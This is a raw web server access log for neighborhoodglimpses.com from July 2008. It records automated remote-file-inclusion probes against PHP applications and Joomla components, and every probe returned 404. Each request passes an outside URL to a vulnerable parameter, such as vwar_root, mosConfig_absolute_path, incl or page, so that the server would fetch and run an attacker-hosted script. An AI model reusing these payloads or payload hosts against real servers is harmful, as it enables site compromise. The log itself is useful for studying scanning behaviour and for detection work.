207.58.170.49 - - [13/Jul/2008:18:11:20 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
69.27.110.65 - - [13/Jul/2008:18:11:24 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
69.27.110.65 - - [13/Jul/2008:18:11:24 -0700] "GET /logs/access_080211.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
69.27.110.65 - - [13/Jul/2008:18:11:25 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
207.58.170.49 - - [13/Jul/2008:18:11:34 -0700] "GET /logs/access.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
207.58.170.49 - - [13/Jul/2008:18:11:34 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
207.58.170.49 - - [13/Jul/2008:18:11:34 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.27.110.65 - - [13/Jul/2008:18:11:40 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
69.27.110.65 - - [13/Jul/2008:18:11:40 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
69.27.110.65 - - [13/Jul/2008:18:11:40 -0700] "GET /logs/access.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
193.178.228.12 - - [13/Jul/2008:18:12:07 -0700] "GET /logs/access_080211.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
193.178.228.12 - - [13/Jul/2008:18:12:08 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
193.178.228.12 - - [13/Jul/2008:18:12:08 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
205.234.234.3 - - [13/Jul/2008:18:14:13 -0700] "GET /logs/access.log/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
205.234.234.3 - - [13/Jul/2008:18:14:13 -0700] "GET /index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
205.234.234.3 - - [13/Jul/2008:18:14:13 -0700] "GET /logs/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
216.246.7.92 - - [13/Jul/2008:18:14:14 -0700] "GET /logs/access.log/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.246.7.92 - - [13/Jul/2008:18:14:14 -0700] "GET /index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.246.7.92 - - [13/Jul/2008:18:14:14 -0700] "GET /logs/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:16:09 -0700] "GET /logs/access_080414.log/index.php?incl=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:16:10 -0700] "GET /index.php?incl=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:16:10 -0700] "GET /logs/index.php?incl=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:18:16:48 -0700] "GET /logs/access_080107.log//include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:18:16:48 -0700] "GET //include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:18:16:49 -0700] "GET /logs//include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:17:35 -0700] "GET /avatar.php?page=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:17:57 -0700] "GET /avatar.php?page=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:18:18:07 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:18:18:07 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:19:28 -0700] "GET /logs/access.log/avatar.php?page=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [13/Jul/2008:18:19:28 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:19:28 -0700] "GET /logs/avatar.php?page=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [13/Jul/2008:18:19:34 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:18:19:38 -0700] "GET /logs/access_080211.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:18:19:38 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:18:19:39 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:19:46 -0700] "GET /logs/access_080211.log/avatar.php?page=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:19:47 -0700] "GET /logs/avatar.php?page=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
207.178.128.116 - - [13/Jul/2008:18:22:04 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.178.128.116 - - [13/Jul/2008:18:22:04 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.178.128.116 - - [13/Jul/2008:18:22:04 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
205.234.163.201 - - [13/Jul/2008:18:23:05 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
205.234.163.201 - - [13/Jul/2008:18:23:06 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
205.234.163.201 - - [13/Jul/2008:18:23:06 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:27:20 -0700] "GET /index.php?incl=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.160.96.54 - - [13/Jul/2008:18:27:32 -0700] "GET /logs/access_080414.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
200.160.96.54 - - [13/Jul/2008:18:27:33 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
200.160.96.54 - - [13/Jul/2008:18:27:34 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:18:28:20 -0700] "GET /logs/access_080414.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:18:28:20 -0700] "GET /logs/access_080414.log/index.php?incl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:18:28:20 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:18:28:21 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.160.96.54 - - [13/Jul/2008:18:28:36 -0700] "GET /logs/access_080225.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
194.143.183.8 - - [13/Jul/2008:18:28:36 -0700] "GET /avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.160.96.54 - - [13/Jul/2008:18:28:36 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
200.160.96.54 - - [13/Jul/2008:18:28:37 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
64.49.254.102 - - [13/Jul/2008:18:29:00 -0700] "GET /logs/access_080414.log//main.php?x=http://alieandrann.net/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.neighborhoodglimpses.com"
194.143.183.8 - - [13/Jul/2008:18:29:02 -0700] "GET /avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:18:29:55 -0700] "GET /skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:18:30:07 -0700] "GET /skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:30:09 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:30:10 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:30:16 -0700] "GET /index.php?incl=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.110.54.240 - - [13/Jul/2008:18:30:44 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
217.110.54.240 - - [13/Jul/2008:18:30:44 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.128.50.35 - - [13/Jul/2008:18:31:20 -0700] "GET /logs/access_080211.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.128.50.35 - - [13/Jul/2008:18:31:27 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.143.183.8 - - [13/Jul/2008:18:31:27 -0700] "GET /logs/access.log/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
194.143.183.8 - - [13/Jul/2008:18:31:28 -0700] "GET /logs/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
195.128.50.35 - - [13/Jul/2008:18:31:30 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
212.227.127.185 - - [13/Jul/2008:18:31:54 -0700] "GET /avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.227.127.185 - - [13/Jul/2008:18:32:05 -0700] "GET /avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.143.183.8 - - [13/Jul/2008:18:32:27 -0700] "GET /logs/access_080211.log/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
194.143.183.8 - - [13/Jul/2008:18:32:28 -0700] "GET /logs/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:32:44 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:32:44 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:32:45 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:32:56 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:32:56 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:32:57 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:33:07 -0700] "GET /logs/access_080211.log/index.php?incl=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
80.93.62.99 - - [13/Jul/2008:18:33:07 -0700] "GET /logs/index.php?incl=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:33:25 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:33:25 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:33:26 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:33:41 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.244.71.72 - - [13/Jul/2008:18:33:42 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:18:34:46 -0700] "GET //display.php?page=http://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:18:34:46 -0700] "GET /logs//display.php?page=http://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "neighborhoodglimpses.com"
212.227.127.185 - - [13/Jul/2008:18:35:00 -0700] "GET /logs/access.log/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.227.127.185 - - [13/Jul/2008:18:35:01 -0700] "GET /logs/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.227.127.185 - - [13/Jul/2008:18:35:42 -0700] "GET /logs/access_080211.log/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
212.227.127.185 - - [13/Jul/2008:18:35:43 -0700] "GET /logs/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
205.234.163.201 - - [13/Jul/2008:18:36:42 -0700] "GET /logs/access.log/errors.php?error=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
205.234.163.201 - - [13/Jul/2008:18:36:43 -0700] "GET /errors.php?error=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
205.234.163.201 - - [13/Jul/2008:18:36:43 -0700] "GET /logs/errors.php?error=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
69.89.31.195 - - [13/Jul/2008:18:37:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
69.89.31.195 - - [13/Jul/2008:18:37:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
195.128.50.35 - - [13/Jul/2008:18:39:23 -0700] "GET /logs/access_080211.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.128.50.35 - - [13/Jul/2008:18:39:26 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.128.50.35 - - [13/Jul/2008:18:39:28 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:18:41:03 -0700] "GET /administrator/components/com_admin/admin.admin.htmhttp://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:18:41:03 -0700] "GET /logs/administrator/components/com_admin/admin.admin.htmhttp://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:18:43:57 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:18:43:57 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:18:46:35 -0700] "GET /administrator/components/com_admin/admin.admin.htmhttp://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:18:46:35 -0700] "GET /logs/administrator/components/com_admin/admin.admin.htmhttp://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "neighborhoodglimpses.com"
200.24.193.42 - - [13/Jul/2008:18:46:56 -0700] "GET /logs/access_080414.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
200.24.193.42 - - [13/Jul/2008:18:46:57 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
200.24.193.42 - - [13/Jul/2008:18:46:58 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
212.227.127.185 - - [13/Jul/2008:18:47:07 -0700] "GET /index.php?incl=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.24.193.42 - - [13/Jul/2008:18:47:48 -0700] "GET /logs/access_080225.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
200.24.193.42 - - [13/Jul/2008:18:47:50 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
200.24.193.42 - - [13/Jul/2008:18:47:51 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
